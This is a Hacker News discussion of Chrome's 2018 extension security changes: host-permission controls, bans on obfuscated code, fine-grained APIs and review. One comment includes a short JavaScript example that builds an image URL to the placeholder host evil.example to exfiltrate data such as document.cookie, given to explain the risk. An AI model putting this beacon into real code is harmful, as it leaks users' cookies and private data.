
Trustworthy Chrome Extensions, by default - seanwilson
https://blog.chromium.org/2018/10/trustworthy-chrome-extensions-by-default.html
======
yonran
Chrome’s auto-update forces you to trust the author of any extension you
install for as long as you use the extension. Google’s “Trustworthy by
default” effort doesn’t change this model since it still provides no
guarantees. This works for some extensions backed by companies (e.g. Adblock),
but it doesn’t work for extensions that add simple functionality.

For small extensions that add basic browser functionality (e.g. reorder tabs,
enable autocomplete), I wish Google would enable users to verify open-source
extensions. I trust the version of the code that I have reviewed on GitHub. I
do not trust that the kid who wrote this extension won’t go rogue and upload a
malicious version in a future auto-updated release. So the only way I can
verify the code that I run is to install it from the Chrome Web Store, copy
the code and verify it, uninstall the Chrome Web Store version, and then load
the unpacked extension (or even publish my own copy of it to the Chrome Web
Store). This is pretty cumbersome.

~~~
notatoad
Chrome's auto-update forces you to trust the author of an extension _until it
requests more permissions_ , at which point the extension is automatically
disabled and the user is prompted to accept the new permissions to re-enable
the extension.

Making the permissions as fine-grained as possible, as Google is doing here,
is a good way to prevent an extension from becoming malicious in the future.

~~~
stouset
Doesn’t this simply encourage extension authors to request as many permissions
as possible from the outset?

Most users just click yes to all of these things. Those who would skip
installing an extension because of this are an extreme minority.

~~~
danShumway
The solution to that is to only request permissions when they're needed, and
to give users prominent options to grant access "only once" or to revoke
access (both of which should be undetectable by extensions without extra work).

This isn't perfect, but it comes with some advantages. It's more work for an
extension author to check for the permissions than to just write their
application logic normally. This means that the lazy authors start coding
their apps correctly (just try to do the thing and let the OS handle asking
for permission), and only the malicious authors are left nagging for
permissions early.

If you have more legitimate apps than malicious ones on your platform, you can
at least start to train some users to see what the malicious apps are doing as
weird. If _most_ of your apps don't ask for permissions up front, then the
ones that do start to look weirder.

If I go to a website, and a permission pops up asking to access my webcam, and
I didn't do something to make that permission pop up... that is really weird
and I'm going to click 'no'. And when I click no, if the website wants to be
cranky about it, they have to write _extra_ code to hide whatever content is
already loaded and pop up a dialog complaining. If I click OK and then
immediately click a button and revoke that permission, they need to have even
more code continually running in the background to detect it.

Again, it's not hard for a malicious extension/app to do that, it's just that
_only_ the malicious extensions/apps are going to do that. So it becomes
easier to educate users with simple rules like, "if a site asks for a
permission that's unrelated to what you're doing, _always_ say no." It also
becomes easier for users who are already careful about permissions to be
paranoid and grant them carefully, because they don't have to decide up-front
whether the app is worth installing -- they can decide later on whether or not
they trust it to have access to something.

Part of having fine-grained permissions is in getting rid of what I call the
Terms of Service version, where you just stick anything you might ever want
inside of a manifest and then users either accept everything or the app
doesn't install.
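
A minimal sketch of the on-demand pattern described above, using Chrome's existing optional-permissions machinery (`chrome.permissions.request` must be called from a user gesture; the origin string here is a stand-in):

```javascript
// Ask for a host permission only when the user clicks the feature that
// needs it, instead of demanding it in the manifest at install time.
function requestHostAccess(origin, onResult) {
  chrome.permissions.request({ origins: [origin] }, granted => onResult(granted));
}

// Let the user revoke the grant afterwards; well-behaved extensions
// shouldn't need to notice when this happens.
function dropHostAccess(origin, onResult) {
  chrome.permissions.remove({ origins: [origin] }, removed => onResult(removed));
}
```

The origin must also be listed under `optional_permissions` in the manifest for the request to succeed.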

~~~
seanwilson
> Again, it's not hard for a malicious extension/app to do that, it's just
> that only the malicious extensions/apps are going to do that. So it becomes
> easier to educate users with simple rules like, "if a site asks for a
> permission that's unrelated to what you're doing, always say no."

Are you sure it's this simple? Adblockers and password managers, for example,
require wide-ranging permissions to work, and there are plenty of popular
extensions in the same situation.

~~~
Ajedi32
Password managers don't need extensive permissions, they just need a built-in
autofill API. Similarly, you could implement a basic adblocker via a
declarative content blocking API.

Fine-grained permissions will allow for this sort of thing.
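
To illustrate: a declarative content blocking API might accept rules of roughly this shape, so the browser enforces the blocking and the extension never sees page content or traffic. No such API existed at the time of writing; the field names below are illustrative, and the URL patterns borrow Adblock Plus filter syntax:

```javascript
// Hypothetical declarative blocking rules: the extension declares what to
// block, the browser does the blocking. The extension needs no host access.
const blockRules = [
  { condition: { urlFilter: "||ads.example.com^" },
    action: { type: "block" } },
  { condition: { urlFilter: "*/banner/*", resourceTypes: ["image"] },
    action: { type: "block" } },
];
```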

~~~
seanwilson
Does that cover the functionality of most popular extensions though? When
there's an API that matches up with the purpose of the extension, it's more
straightforward. I would have thought the popularity of those particular
example extensions is what partially drove the creation of those APIs as well.

~~~
Ajedi32
The APIs I mentioned in my previous comment don't exist yet. My point is that
Google is going to need to _build_ APIs to fulfill all of the most common use
cases (including those ones) in order to succeed in their goal of making
extension permissions more fine-grained.

So yes, the functionality of most popular extensions will be covered by the
new APIs, because Google will be designing the new APIs with those popular
extensions in mind.

------
nickysielicki
Now that modern operating systems come bundled with antivirus and
sophisticated kernel security techniques, and most of all because the Web is
winning and most of our computer interaction happens through a web browser,
browser extensions are a prime place for malware to enter someone's PC. Both
Mozilla and Google have not given this enough attention, so it's good to see
it being addressed. I can understand the concerns about walled gardens and so
on, but I think that's just a pill you have to swallow. If you want to use a
self-loaded extension, that's still available, and you'll always be able to
find a Chromium build that allows it if it's very important to you. For most
people, it's not a big concern.

All that being said, there's still so much that Chrome needs to fix when it
comes to extensions. Extension updates are done in a very opaque way.
Extensions that alter network requests have precedence based on their install
order --- and there's no clean way for two extensions to really coordinate
between each other. This means that HTTPS Everywhere and Decentraleyes and
uBlock conflict with one another, _and the solution might be to uninstall and
reinstall them in a different order_. That is clearly insanity. What happens
when you login to Chrome on a new machine and your extensions are pulled in,
is the install order guaranteed to match your previous machine?

There's also no centralized storage for extensions, which means that settings
are generally going to be completely different between machines unless the
extension implements its own syncing/backup code.

There's also no way to disable an extension on one machine without disabling
it on another machine. That means that if you want an app on your Chromebook,
it's gotta be on your desktop as well.

It's frustrating to use extensions on Chrome.

~~~
lousken
> browser extensions are a prime place for malware to enter someone's PC. Both
> Mozilla and Google have not given it enough attention.

Well, Firefox switched to WebExtensions for security reasons and received a
lot of flak because of it. So I'd say the opposite: Mozilla pushed this hard
and is still working on better support.

> there's no clean way for two extensions to really coordinate between each
> other

I don't think something like this should be allowed; it could be abused.
Instead, browsers should embrace the fact that they've become operating
systems inside operating systems and implement some of the most used
extensions natively.

I completely agree about extension settings sync though; it's a major pain
across all browsers, not just Chrome.

------
Ajedi32
This is great. Extensions have long been a weak point in the web security
model, since many extensions currently require what is essentially the web
equivalent of root privileges (UXSS) in order to function. It's good to see
Google finally doing something to try to remedy this.

~~~
seanwilson
I'm not sure how much this will help to be honest. I haven't looked into the
stats for this, but a huge number of popular and useful extensions require
access to reading/writing data to all domains to function so users just get
used to this being a standard permission they have to allow.

One tip I suggest though: create one locked-down profile in Chrome that you
use for email, banking etc., and a separate profile where you can be less
careful about installing extensions. Extensions in the second profile won't
have access to your browsing activity in the first profile. For example, I
have a profile I use for web development where I install lots of extensions
that require access to everything.

~~~
Ajedi32
The new user controls are just a temporary stopgap measure. The real solution
Google is working towards is Manifest v3, which will be designed as a much
better system with fine-grained permissions.

If Google follows the same model with Chrome that they did with Android, UXSS
permissions will eventually be phased out and replaced with better, more
secure, opt-in, purpose-built APIs in Chrome. (Assuming they can do that
without sacrificing _too_ much functionality.)

~~~
andrenotgiant
Almost nobody makes well thought out decisions when agreeing to permissions
during the extension install process.

EULAs, Terms of Service, Mobile Apps, Cookie Consents have boy-who-cried-
wolf'ed everyone except the most paranoid and tech-savvy to the point that
they are mostly ignored.

~~~
danShumway
Stop taking away people's locks just because other people don't use them.

Yes, many non-technical users do not pay attention to permissions. But
permissions are extremely helpful to people who do use them -- and the number
of people who do use them is larger than the number of people who audit source
code or set up VMs.

Educating normal users to pay attention to permissions is a problem. It is a
separate problem from "do they even have tools in the first place if they
want to use them." The problem I want solved is how _I_ verify that an
extension is safe. Granular extension permissions solve that problem for
people like me.

After that problem is solved, then I can worry about educating my friends and
family.

------
seanwilson
"Starting today, Chrome Web Store will no longer allow extensions with
obfuscated code...Ordinary minification, on the other hand, typically speeds
up code execution as it reduces code size, and is much more straightforward to
review. Thus, minification will still be allowed"

I have a Chrome extension that uses Webpack to convert TypeScript to
JavaScript, then uses UglifyJS to minify it. If I submit only the minified
code, is this compliant?
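
For what it's worth, one way to hedge is to minify without the transforms most likely to read as obfuscation. A webpack 4 config sketch, assuming `uglifyjs-webpack-plugin` (whether any given output satisfies the policy is Google's call; this only shows turning the most opaque transforms off):

```javascript
// Minify but keep identifier names, so the submitted bundle stays
// closer to something a reviewer can read.
const UglifyJsPlugin = require("uglifyjs-webpack-plugin");

module.exports = {
  optimization: {
    minimizer: [
      new UglifyJsPlugin({
        uglifyOptions: {
          mangle: false,                  // keep original identifier names
          compress: { sequences: false }, // avoid dense comma-chained output
          output: { comments: false },
        },
      }),
    ],
  },
};
```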

~~~
albertgoeswoof
On Firefox the reviewer took my source code, inc package.json, and ran it
through the exact same version of my dependencies and then did a checksum of
the output against what I submitted. The reviewer also read my source code and
reviewed all dependencies.

It was a pain to get through but doing good things for your users takes
effort.

~~~
seanwilson
Is it correct that Firefox makes your extension live shortly after you upload
it, as long as it passes some automated checks, but that it can be taken down
later if it fails the human review?

~~~
dessant
That is correct. Opera Add-ons remains the last of the larger extension stores
that requires a review before a version gets published.

------
dsissitka
> User controls for host permissions

That is really nice.

One of the reasons Firefox is a non-starter for me is that sometimes there's
no good way to tell what hosts an extension requires access to:

[https://imgur.com/a/k4rk0](https://imgur.com/a/k4rk0)

------
jchw
This seems like a great effort. However, I worry what this means for the
future of WebAssembly inside of extensions. There's an undeniable advantage to
being able to write extensions in languages other than JavaScript. AgileBits
has been writing the 1Password X extension in Go, compiled to JS. While the
JS isn't obfuscated per se, it's also not very readable.

I hope they can find a path forward that doesn't kill off extensions like
1Password X.

------
skrebbel
I think some more granularity in permissions with respect to how extensions
may change websites would be useful too.

For example, it would be easy for Google/Mozilla/etc. to compile a list of
HTML tags and attributes that can never be used to inject JavaScript; lots of
"HTML sanitization" libraries do this. Then we could get permissions like
"remove content", "inject non-interactive content" and "inject interactive
content". An ad blocker, for instance, should work with no network access
whatsoever and should never need to inject code, so I could totally lock it
down to not being able to do anything except replace ads with empty <div>
tags.
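
The allowlist idea can be sketched as a plain classifier over tag and attribute names, the way HTML sanitizers work. The lists below are illustrative, not complete:

```javascript
// Classify an injected element as "inert" (cannot run script or trigger
// a fetch) by checking its tag and attributes against fixed allow/deny
// lists. A browser could grant "inject non-interactive content" by only
// permitting insertions that pass a check like this.
const INERT_TAGS = new Set(["div", "span", "p", "br", "hr"]);
// Deny event handlers (on*) and attributes that carry URLs or code.
const SCRIPTY_ATTRS = /^on|^(href|src|srcdoc|formaction|action|style)$/i;

function isInertInjection(tagName, attrNames) {
  if (!INERT_TAGS.has(tagName.toLowerCase())) return false;
  return attrNames.every(a => !SCRIPTY_ATTRS.test(a));
}
```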

I think there's an opportunity for browser builders with more granular
permissions in other areas too (e.g. "network access, but only to domains x
and y", which of course only makes sense if you can't also inject arbitrary
interactive content, but still). No user is of course ever going to read
those, or understand which combinations of permissions make sense, but a
Google reviewer can. Then the reviewer no longer needs to review whether the
code does something bad, but only whether the requested permissions would
_allow_ the code to do something bad and whether the permissions make sense
for what the extension is supposed to be doing.

E.g. LastPass ought to work just fine with only "access to *.lastpass.com"
plus "inject only non-interactive content".

This could be particularly powerful if browser designers would create a way
for extensions to show possibly-interactive content on the
top/left/side/bottom of the page (in a popover bar for instance) that is
clearly not part of the page DOM. Then, LastPass can remove their "click to
auto-fill" icons inside user/pass forms and replace them with a "That looks
like a login form. Do you want to auto-login?" popover bar with an OK button.
The UX is still great, and security is greatly improved.

I don't pretend to be smarter than the teams that build browsers, so I may be
missing something. Nevertheless right now I think that this, combined with the
feature announced in this post where extensions can be locked down to specific
websites, will remove the need for nearly any "can change anything on any
website and do anything with it" extensions (which are pretty much the norm
right now). Gmail extension? Website-specific. Pinterest "pin it" button? Non-
interactive (make the injected button just be a selector and show the final
"pin selected images" action in a popover bar). HN-Submit? Non-interactive.
And so on.

~~~
X-Cubed
A lot of that functionality is already possible through Declarative Content[1]
and Optional Permissions[2]. These remove the need for extensions to have
permissions to all websites, while enabling them to be given permission to a
site after installation. However, these features weren't part of the original
APIs, so I think a lot of extension developers aren't familiar with them,
don't want to refactor their existing codebases to support these features, or
are targeting multiple browsers where other browsers don't support this
functionality.

1\.
[https://developer.chrome.com/extensions/declarativeContent](https://developer.chrome.com/extensions/declarativeContent)
2\.
[https://developer.chrome.com/apps/permissions](https://developer.chrome.com/apps/permissions)

------
skybrian
Overall this looks great, but I wonder whether extensions will be allowed that
are written in compiled languages? Dart, Go (via GopherJS), Kotlin, and so on?
Is WebAssembly supported?

~~~
coolspot
Both Chrome and Firefox support WebAssembly in extensions.

So technically you can write a whole extension in WebAssembly with a thin
wrapper written in JS.

Although "Starting today, Chrome Web Store will no longer allow extensions
with obfuscated code." which might be an issue.

------
seanwilson
So by default, Chrome extensions will still be able to access any domain
they've asked for permission to in their manifest (which can include all
domains), but users can optionally restrict this? Is this really going to help
non-technical users much?

~~~
Ajedi32
Not at first. The real benefit to non-technical users will come once Google
starts using this system to pressure extension developers to migrate to newer
APIs with more limited permissions.

Right now, as you say, only power users will use this feature. But once
suitable alternative permissions are available for the more common use cases,
Google will start to transition to "When you click the extension" as the
default setting, which will put pressure on affected extension developers to
migrate to the new permissions systems to avoid unnecessary friction for their
users.

------
akerl_
"This includes code within the extension package as well as any external code
or resource fetched from the web."

How does this affect Greasemonkey-style extensions where the user imports JS
to run on pages?

------
sbr464
Any updates like these are appreciated, since I've all but stopped using
extensions and would like to start using them again one day. I don't think
the current system, with messages in the UI like "read/change all data on all
sites you visit", is acceptable in the current 2018 environment. I feel like a
default-deny-all policy and a (user-friendly) way to review what data/URLs an
extension is accessing is needed. There currently is too much trust involved,
and it seems like it shouldn't be needed. One idea is for Chrome to provide
the extension with a sandboxed, virtual DOM API that doesn't pass any
user-identifiable data. The extension registers with Chrome the functionality
it provides, like "fill the main password field with this string", and Chrome
executes that action internally. It can never request user/history/etc. data,
just provide functionality to a black box.
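
A purely hypothetical sketch of that registration model; every name here (`registerCapability`, the event shape) is invented for illustration, and no such API exists:

```javascript
// The extension registers a capability and a handler; the browser invokes
// the handler with only the inputs it chooses to expose. The extension
// never sees the page, the URL, or the user's identity -- it just returns
// the action the browser should perform on its behalf.
function registerWithBrowser(api, vault) {
  api.registerCapability("fill-password-field", event => ({
    action: "fill",
    value: vault[event.fieldHint] || "",
  }));
}
```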

------
user812
Can someone explain to me why it isn't possible to simply give users the
option to influence whether an extension can make a request to a remote
server?

This way one could simply disallow extensions from doing anything that isn't
happening locally.

~~~
rictic
It's trickier than it seems. To take just one example, suppose you have an
extension that modifies pages to insert a related link (e.g. an extension that
tries to infer a hacker news user's reddit account and link to it from their
HN profile page).

The extension needs permission to modify documents on the Hacker News domain.
But if it can insert an <a> tag, what's to stop it from inserting an invisible
<img src> tag, which could be used to exfiltrate data? Or even just inserting
an <a> tag with an onClick handler, or a javascript: URL?
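
To make the exfiltration channel concrete: building the URL is all the "code" a malicious extension needs, because the browser performs the fetch the moment an image element with that URL attribute is inserted (`evil.example` is a placeholder):

```javascript
// Smuggle arbitrary page data out through an image request.
function exfilImageUrl(secret) {
  return "https://evil.example/log?d=" + encodeURIComponent(secret);
}
// e.g. img.src = exfilImageUrl(document.cookie); then append img anywhere.
```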

~~~
andrenotgiant
Right - or even trickier... Imagine Google manages to block extensions from
inserting <img> tags that reference other domains as a way of exfiltrating
data... There are so many other ways to do it:

Say you have an extension that ONLY wants access to mail.google.com. It might
feel safer because it can't load any third-party scripts. But it can just as
easily SEND data from your account as an email, which it promptly deletes.

Same goes for LinkedIn, Facebook, HN, any interactive website can be used to
exfiltrate data.

------
jamieweb
One thing that I'd like to see is mandatory code signing, so that even in the
event of a compromised developer account it's not possible for an update to be
pushed out unless the attacker also has the signing key.

------
felipelemos
What is the implication to ad blockers as a whole?

~~~
throwawaymath
Ad blockers will continue to function as they currently do. However, users may
need to explicitly grant ad blockers whitelisted access to all hosts if this
feature is implemented with default-deny.

~~~
danShumway
Which is entirely reasonable IMO.

They _should_ implement default-deny. It'll take two seconds for users to
grant the permission, and the vast majority of extensions don't need it.

------
lvh
I would like to know more about the review methodology and when the review is
triggered. If I ask for wide permissions, get them, and then sell my extension
to a malicious third party, what triggers the review?

------
actionowl
I like the host access restriction policy they describe. I update and fix
existing extensions for customers, and about 90% of the time the previous
author has added unnecessary permissions and access to URLs.

------
pjmlp
The best way is not to use any extensions to start with.

~~~
Jyaif
If you care about security, don't use a browser.

~~~
pjmlp
Actually I vote that browsers should have stuck with Web 1.0, for plain
documents.

I still do most of my web development with server side rendering stacks.

------
kevingadd
For context: I have an extension designed for a single HTML5 game, with
roughly ~80k weekly active users. I've been using the Chrome Web Store to
deploy and update it for about 2 years, and recently wrote my own installer
after Google blocked me from issuing security updates for over a month. I also
had to build my own configuration update system so I could disable features
on an hour's notice, due to the security update incident and Chrome taking
over a day to install updates. I'm serving about 3GB of configuration and
update data per day right now, at around 1kb/user/hr.

Lots of functionality (and thus many current extensions) requires requesting
blanket access to all websites, so Google has a big task ahead of it trying to
get all those extensions to comply.

In general the way things work for Chrome Extensions right now is bad for
users and downright hostile to developers. Because I actually followed best
practices on extension permissions I got a lot of confused, paranoid users,
and had to explain Google's awful permissions model and UI in detail:
[https://www.reddit.com/r/Granblue_en/comments/86bdmo/psa_vir...](https://www.reddit.com/r/Granblue_en/comments/86bdmo/psa_viramate_is_back_on_chromestore/)
If I had simply requested a large set of blanket permissions when I first
created the extension, I would've saved myself a huge amount of effort.

Users having the choice to scope wildcards down to specific pages is _a
start_, but until it's the default it isn't really a meaningful improvement
for anyone, because few people are qualified to actually set those
restrictions properly. The design of the extension API itself tends to require
wildcards to provide functionality, due to limitations in the other APIs. For
example, if you want to do anything fancy with web requests and do it
performantly, you may need to inject JS directly into webpages; the
background-page-based webRequest API is slow and missing key features.
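
For reference, the blocking webRequest API mentioned above looks roughly like this; it requires the `webRequest` and `webRequestBlocking` permissions plus host permissions for the filtered URLs, which is exactly the blanket access being discussed (`tracker.example` is a placeholder):

```javascript
// Decide whether a request should be cancelled, by hostname.
function shouldCancel(url) {
  const host = new URL(url).hostname;
  return host === "tracker.example" || host.endsWith(".tracker.example");
}

// Every matching request round-trips through this listener in the
// background page, which is the performance problem described above.
function registerBlocker() {
  chrome.webRequest.onBeforeRequest.addListener(
    details => ({ cancel: shouldCancel(details.url) }),
    { urls: ["<all_urls>"] },
    ["blocking"]
  );
}
```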

There's also a risk here that by trying to kludge better access controls into
the existing full-of-holes extension model, Google is going to break tons of
extensions that ordinary users rely on and they're going to be too frustrated
by this to be happy about any security upside.

Some genuinely good changes though:

* Requiring 2FA to deploy extension updates. This is a big vulnerability in the existing system, especially if an extension has many users. It's been exploited in the past.

* Service worker support (probably) - the current model with page/content/background scripts and popup pages is a nightmare both to author and debug, hopefully service workers will provide a better way to architect all of this.

* Narrowly scoped declarative APIs - hopefully this means extension developers can finally get access to smaller features without having to request access to the entire universe. Some of the feature scoping is really absurd and occasionally unrelated APIs are tucked under a larger permission in a way that really confuses users. As I explained to users in my old reddit comment above, Google currently uses "Access your browsing history" to describe an ENORMOUS set of unrelated features.

* Blocking obfuscated JS - this literally will do nothing to protect users, but it's worth disallowing anyway. There's no good reason to obfuscate extension JS, since it's so hard to debug extensions you didn't write anyway. It's possible this will make it easier for them to apply machine learning to identify malicious extension code, at least, but I bet the machine learning will just randomly reject updates to legitimate extensions without any explanation and you'll be screwed.

The big wildcard here is Google's history of failing to maintain or properly
document extension APIs. They're going to be rearranging lots of existing
stuff and adding new stuff, so the underlying mess will probably become 10x
worse. Core APIs like notifications have been entirely or partially broken for
years with no effort made to fix them or update the docs. Inertia is one of
the main things carrying the Chrome extension ecosystem forward, and it's
possible many extension developers will churn out after they find the
migration effort involved here too much, similar to how Firefox lost many
extensions during its two transitions (old -> multiprocess-compatible ->
WebExtensions).

------
keyle
I'm certainly starting to trust the extensions more than the core browser
these days...

------
albertgoeswoof
Reposting this comment as I think it’s relevant at the top level.

On Firefox the reviewer took my source code, inc package.json, and ran it
through the exact same version of my dependencies and then did a checksum of
the output against what I submitted. The reviewer also read my source code and
reviewed all dependencies.

It was a pain to get through but doing good things for your users takes
effort.

